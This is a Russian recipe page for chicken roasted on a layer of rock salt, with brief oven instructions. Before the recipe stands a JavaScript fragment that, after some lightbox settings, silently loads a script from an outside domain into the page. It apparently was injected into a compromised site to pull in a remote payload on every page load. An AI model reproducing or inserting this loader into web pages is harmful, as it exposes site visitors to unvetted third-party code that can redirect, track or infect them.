, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Вкусно + Полезно

Курица на соли


kursolfinalЗапекание — близкое нашему сердцу кулинарное действо! Жаль, что ушли те времена, когда можно было посидеть у костра и, медленно покручивая барашка на вертеле, за чашечкой грога беседовать с друзьями. Я такое видела только в исторических фильмах и не знаю вкусные ли получались барашки. Но я знаю точно, что курица на соли — это однозначно блюдо № 1. Просто и вкусно!

Чего и сколько берем:

1. Целого цыпленка

2. Пачку каменной соли

Начинаем готовить:

Это блюдо настолько простое, что и писать особо не о чем)))) Разогреваем духовку до 200 градусов. На противень высыпаем соль и разравниваем, чтобы толщина слоя была не менее 1 см. Курицу моем и разрезаем ей пузико, чтобы она получилась плоской. Кладем внутренней частью на соль и отправляем в духовку. Минут через 25 вытаскиваем противень и смазываем верхнюю часть курицы сметаной. Отправляем обратно еще минут на 5-10. Потом переворачиваем  курицу, смазываем сразу внутреннюю поверхность сметаной и опять в духовку минут на 10-15. Лучше все время подслеживать, чтобы не спалить птицу и не сорвать обед или ужин.

Дальше можно подать курочку целиком и после разрезать на кусочки для употребления, а можно и сразу разрезать. Приятного аппетита!

 

На эту тему вы можете почитать:

Курочка в соусе Тамаринда
Салат из курицы по-французски
Куриные грудки "Универсальные"

Тэги: , ,



Добавить комментарий